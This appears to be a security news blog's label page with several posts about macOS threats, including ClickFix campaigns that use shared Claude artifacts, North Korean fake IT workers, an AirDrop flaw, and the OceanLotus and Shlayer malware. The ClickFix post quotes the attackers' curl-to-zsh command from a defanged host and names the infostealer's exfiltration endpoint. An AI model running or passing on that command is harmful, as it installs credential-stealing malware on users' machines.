Search This Blog
Powered by Blogger.

Blog Archive

Labels

Footer About

Footer About

Labels

Load More
Trendy Right Now

Popular Posts

Showing posts with label Mac OS. Show all posts
Mac OS
Claude Claude AI risk ClickFix ClickFix Attacks Cyber Security Google Ads Infostealer Infostealer Malware Mac OS

ClickFix Campaigns Exploit Claude Artifacts to Target macOS Users with Infostealers

 

One out of every hundred Mac users searching online might now face hidden risks. Instead of helpful tools, some find traps disguised as guides - especially when looking up things like "DNS resolver" or "HomeBrew." Behind these results, attackers run silent operations using fake posts linked to real services. Notably, they borrow content connected to Claude, spreading it through paid search ads on Google. Each click can lead straight into their hands. Two separate versions of this scheme are already circulating. Evidence suggests more than ten thousand people followed the harmful steps without knowing. Most never realized what was taken. Quiet but widespread, the pattern reveals how easily trust gets hijacked in plain sight. 

Beginning with public posts shaped by Anthropic’s AI, a Claude artifact emerges when someone shares output from the system online. Hosted on claude.ai, such material might include scripts, how-tos, or fragments of working code - open for viewing through shared URLs. During recent ClickFix operations, deceptive search entries reroute people toward counterfeit versions of these documents. Instead of genuine help, visitors land on forged Medium pieces mimicking Apple's support site. From there, directions appear telling them to insert command-line strings straight into Terminal. Though it feels harmless at first glance, that single step triggers the start of compromise. 

The technical execution of these attacks involves two primary command variants. One common method utilizes an `echo` command, which is then piped through `base64 -D | zsh` for execution. The second variant employs a `curl` command to covertly fetch and execute a remote script: `true && cur""l -SsLfk --compressed "https://raxelpak[.]com/curl/[hash]" | zsh`. Upon successful execution of either command, the MacSync infostealer is deployed onto the macOS system. This potent malware is specifically engineered to exfiltrate a wide array of sensitive user data, including crucial keychain information, browser data, and cryptocurrency wallet details. 

One way attackers stay hidden involves disguising their traffic as ordinary web requests. A suspicious Claude guide, spotted by Moonlock Lab analysts, reached more than 15,600 users - an indicator of wide exposure. Instead of sending raw information, the system bundles stolen content neatly into a ZIP file, often stored temporarily under `/tmp/osalogging.zip`. This package then travels outward through an HTTP POST directed at domains such as `a2abotnet[.]com/gate`. Behind the scenes, access relies on fixed credentials: a preset token and API key baked directly into the code. For extra stealth, it mimics a macOS-based browser's digital fingerprint during exchanges. When uploads stall, the archive splits into lighter segments, allowing repeated tries - up to eight attempts occur if needed. Once delivery finishes, leftover files vanish instantly, leaving minimal evidence behind.  

This latest operation looks much like earlier efforts where hackers used chat-sharing functions in major language models - like ChatGPT and Grok - to spread the AMOS infostealer. What makes the shift toward targeting Claude notable is how attackers keep expanding their methods across different AI systems. Because of this, users need to stay highly alert, especially when it comes to running Terminal instructions they do not completely trust. One useful check, pointed out by Kaspersky analysts, means pausing first to ask the same assistant about any command’s intent and risk before carrying it out.
Read more »
Windows
Cyber Attacks Mac OS North Korea Remote Work threat mitigation Windows

Hackers Disguise as IT Employees: FBI Warns to Disable Local Admin Accounts

Hackers Disguise as IT Employees: FBI Warns to Disable Local Admin Accounts

Hackers use various ways to steal user data, one recent trend, according to the FBI, shows they have started gaining employment with companies. The agency has pushed out public announcement I-012325-PSA, warning organizations in the U.S. to disable local admin accounts, business must pay attention to it.

North Korean Hackers Disguising as IT Workers

The FBI has warned the public, private sector, and the world about the “victimization of US-based businesses”, as cyberattacks involving remote IT workers from North Korea are on the rise. It has noticed North Korean IT workers gaining illegal access to systems to steal confidential data and launch other cyber-crime operations. 

In an FBI announcement reported by Forbes, it was disclosed that “victims have seen proprietary data and code held to ransom,” and “the copying of corporate code repositories to attacker user profiles and personal cloud accounts.” Additionally,  the attackers have also “attempted harvesting of company credentials and session cookies for further compromise opportunities.” 

Understanding the “Principle of Least Privilege”

Law enforcement and intelligence agencies like the FBI and NSA (National Security Agency) have advised the principle of least privilege,  to “only allow designated administrator accounts to be used for administrative purposes.” The aim is to limit the administrative rights available to Mac and Windows users to ensure security. 

The principle of least privilege gives admin account access to only selected people, and nobody else. The method ensures company employees only have access to particular resources needed to get the job done, not admin rights. For instance, the user account completes day-to-day needs, whereas for something critical, like software installation, the systems will ask for admin credentials. 

Wikipedia is one great example of using this technique, it has user accounts for making backups that don’t need to install software and only have rights for running backups and related applications. 

Mitigating Threats- Advice from FBI and Security Experts

The FBI suggests businesses disable local administrator accounts and restrict privileges for installing remote desktop apps, keeping an eye out for any unusual network traffic. It has warned organizations to remember that “North Korean IT workers often have multiple logins into one account in a short period of time,” coming from various IP addresses linked with different countries. 

The agency has also advised HRs, development teams, and hiring managers to focus “on changes in address or payment platforms during the onboarding process.”

Read more »
Mac OS
1.5 billion AirDrop Apple Cyber Security iOS Mac OS

Apple's AirDrop Comes with a Security Flaw

 

Due to its intriguing features, the much-hyped announcement of AirDrop at the Apple event drew a lot of attention. However, it has recently been discovered that AirDrop has a security loophole that allows users to see personal information such as email addresses and phone numbers. This may result in a data leak affecting over 1.5 billion Apple users, as well as other security concerns. 

According to a study citing researchers from Germany's Technische Universitat Darmstadt, everyone can reach Apple users' email addresses and phone numbers, even if they are strangers, by simply opening the sharing pane on the smartphone and initiating the sharing process. A secure Wi-Fi link and proximity between the two Apple devices are needed to complete this task. 

The researchers discovered a flaw in the Contacts Only setting. You use the iOS Sharing function and choose AirDrop as the method to share a file with anyone via AirDrop. If the other person's AirDrop is set to Contacts Only, Apple must check to see if you're on their contact list. The corporation does this by comparing the contact number and email address to entries in the other person's address book. 

Apple uses a hashing feature to obfuscate your phone number and email address during this process to keep it secure. However, university researchers have already found that this hashing would not effectively preserve the data's privacy. 

“As an attacker, it is possible to learn the phone numbers and email addresses of AirDrop users—even as a complete stranger," the researchers said in the report. "All they require is a Wi-Fi-capable device and physical proximity to a target that initiates the discovery process by opening the sharing pane on an iOS or macOS device.”

The researchers said they developed their own approach, called "PrivateDrop," to replace the insecure AirDrop design. Without needing to swap the insecure hash values, PrivateDrop can easily and safely verify whether you're in a fellow iPhone user's contact list using optimised cryptographic protocols. PrivateDrop is available for third-party review on GitHub.

For the time being, the researchers recommend that users disable AirDrop. To do so on an iPhone or iPad, go to Settings, General, and then press the AirDrop entry. Select Receiving Off from the drop-down menu.
Read more »
malware
Apple iOS M1 Chip Mac OS malware

Malware Affecting Apple’s New M1 Chip Detected by Researchers

 

MAC malware has relatively been a less popular choice than its equivalents for Windows attacks, but the vulnerability to Apple computers has been more prevalent in the last few years. There are adware and even Mac-customized malware, and attackers still try to bypass Apple's new protections. Hackers have now made their debut in malware programmed to run Apple's latest M1 ARM processors, launched in November for MacBook Pro, MacBook Air, and Mac Mini. 

Apple's M1 chip is a divergence since 2005 from the Intel x86 architecture, which provides Apple a chance to bake some Mac security safeguards and functionality directly to its processors. This transition allowed legitimate developers to create the software version that runs on M1 "natively" and does not require translating via an Apple emulator named Rosetta 2. 

As per a blog published on 14th February by Mac security researcher Patrick Wardle, a Safari adware extension, originally written for Intel x86 chips, was modified to operate on new M1 chips. The malicious GoSearch22 extension has been traced to the Pirrit Mac adware family, according to Wardle. 

Researchers from the Red Canary along with the Pirrit Mac adware have written a blog on another strain of malware – Silver Sparrow – which varies from the one detected by Wardle. Although Silver Sparrow has not yet released malicious packages, the Red Canary researchers have confirmed that they are able to discharge malicious payloads at a time. Silver Sparrow compromised 29,139 macOS endpoints, including the high identification volumes in the U.S.A., the United Kingdom, Canada, France, and Germany, on February 17 in 153 countries, based on data from Malwarebytes given to Red Canary.

Kevin Dunne -President of Greenlight, said malware developers' capability to reverse engineer the M1 chip is only three months. Although the malware only has a minimum footprint, Dunne said that it will likely grow with time to harness more vectors of attack. 

“Once bad actors have control of the physical device, they can use that device as an access point to the networks that machine is connected to, either physically or via VPN,” Dunne said. “This reinforces the need for additional protection at the application layer, to constantly assess activity within those applications for unusual behaviour and mitigate potential risks in real time.”

Malware manufacturers and dealers are developing advanced devices and software with the way they produce and sell them, and so are the legal businesses, Jon Gulley, a security test application at nVisium added. 

For now, researchers have found that the native M1 malware doesn't appear to be an incredibly dangerous threat. However, the advent of these new strains is a sign of the future and of the need for detective devices to close the void.
Read more »
OceanLotus
APT APT attacks Backdoor hacking groups Mac OS malware OceanLotus

Updated Malware: Vietnamese Hacking Group Targeting MacOS Users

 

Researchers have discovered a new MacOS backdoor that steals credentials and confidential information. As cyber threats continue to rise, the newly discovered malware is believed to be operated by Vietnamese hacking group OceanLotus, colloquially known as APT 32. Other common names include APT-C-00, SeaLotus, and Cobalt Kitty. 
 
The nation-state backed hacking group has been operating across Asia and is known to target governments, media organizations, research institutes, human rights organizations, corporate sector, and political entities across the Philippines, Laos, Vietnam, and Cambodia. Other campaigns by the hacking group also focused on maritime construction companies. Notably, OceanLotus APT also made headlines for distributing malware through Apps on Google Play along with malicious websites. 
 
The attackers found the MacOS backdoor in a malicious Word document that supposedly came via an email. However, there is no information regarding the targets that the campaign is focusing on. In order to set the attack into motion, the victims are encouraged to run a Zip file appearing to be a Word document (disguised as a Word icon). Upon running the Zip file, the app bundled in it carrying the malware gets installed; there are two files in it, one is the shell script and another one is the Word file. The MacOS backdoor is designed by attackers to provide them with a window into the affected system, allowing them to steal sensitive data.

"Like older versions of the OceanLotus backdoor, the new version contains two main functions: one for collecting operating system information and submitting this to its malicious C&C servers and receiving additional C&C communication information, and another for the backdoor capabilities," TrendMicro explained in a blogpost. 

In an analysis, Researchers told, “When a user looks for the fake doc folder via the macOS Finder app or the terminal command line, the folder’s name shows ‘ALL tim nha Chi Ngoc Canada.doc’ (‘tìm nhà Chị Ngọc’ roughly translates to ‘find Mrs. Ngoc’s house’).”

“However, checking the original .zip file that contains the folder shows three unexpected bytes between ‘.’ and ‘doc’.”


Read more »
P2P Botnets
Android Botnet Linux Mac OS malware P2P Botnets

'InterPlanetary Storm' Botnet Now Targeting MAC and IoT Devices


First discovered in 2019, the InterPlanetary Storm malware has resurfaced with a new variant targeting Mac and Android along with Windows and Linux machines, as per the findings by researchers at IT security firm, Barracuda Networks.

The malware is known as ‘InterPlanetary Storm’ as it makes use of InterPlanetary File System (IFES) peer-to-peer (p2p) network - using a legitimate p2p network makes it difficult to identify the malicious traffic because it gets intermixed with legitimate traffic. The malware targets Windows machines and lets the attacker execute any arbitrary PowerShell code on the compromised systems.

“The malware detects the CPU architecture and running OS of its victims, and it can run on ARM-based machines, an architecture that is quite common with routers and other IoT devices,” the researchers noted.

The earlier versions of the Interplanetary Storm malware that surfaced in May 2019 compromised Windows-based devices, however, by June 2019; the botnet could also infect Linux machines. The new versions with add-on capabilities attempt to infect machines via a dictionary attack, it’s a form of brute force attack technique that involves breaking into a password-protected system by systematically guessing passwords. The most recent version detected in August is configured to infect Mac along with IoT devices like televisions running the Android OS, as per a report published on Thursday by Barracuda Networks.

In the report, Erez Turjeman, a researcher with Barracuda, says, "The malware detects the CPU architecture and running OS of its victims, and it can run on ARM-based machines, an architecture that is quite common with routers and other [internet of things] devices.” "The malware is called InterPlanetary Storm because it uses the InterPlanetary File System (IPFS) p2p network and its underlying libp2p implementation," the report further notes.

"This allows infected nodes to communicate with each other directly or through other nodes (i.e., relays).”

The malware was found building a botnet that has infected approximately 13,000 devices in 84 different countries worldwide including the U.S., Brazil, Europe, and Canada. However, the majority of targets were based in Asia constituting a total of 64%. Infections found in South Korea, Taiwan, and Hong Kong amounted to a total of 59%. Russia and Ukraine constituted 8% to the total and United States and Canada did 5%. Rest, China and Sweden constituted 3% each.
Read more »
Shlayer
Apple Mac OS malware Shlayer

Alert! Your Mac maybe under threat - SHLAYER MALWARE attacks every 10th Mac OS


The macOS traditionally was always considered a safe bet compared to Windows but now even Apple is facing a dangerous security threat.


Kaspersky reports that Macs have become a hot target for a dangerous malware - SHLAYER, been active for two years this malware-infected 10 percent of MacOS, affecting more than one in ten users.

“The Shlayer Trojan is the most common threat on macOS,” Kaspersky Labs reported on Jan 23, 2020. The users from France, Germany, the United States, and the United Kingdom become the top target of Shlayer in 2019.

As for what is Shlayer, Seals said, "Shlayer is a trojan downloader, which spreads via fake applications that hide its malicious code...Its main purpose is to fetch and install various adware variants. "These second-stage samples bombard users with ads, and also intercept browser searches in order to modify the search results to promote yet more ads."

As per the report by Kaspersky, after the malware is installed on the system it displays chains of advertisement, recovering advertisement revenue and slowing your Mac. “The macOS platform is a good source of income for cybercriminals,” warns Kaspersky. However, “the most widespread threats are linked to illicit advertising,” reassures the report.

Hides behind fake updates

The malware enters your system through fake flash updates, fooling the victim into installing the update and paving the way into your Mac. Many illegal streaming websites are filled with these fake updates. You may have encountered streaming websites asking for flash updates before playing the video, this malware hides behind such adverts.

"Our statistics show that the majority of Shlayer attacks are against users in the U.S. (31%), followed by Germany (14%), France (10%), and the UK (10%). This is wholly consistent with the terms and conditions of partner programs that deliver the malware, and with the fact that almost all sites with fake Flash Player download pages had English-language content", Kaspersky reports.

These fake updates could also be present on some legitimate websites, so be careful while downloading any updates.
Read more »
Subscribe to: Comments (Atom)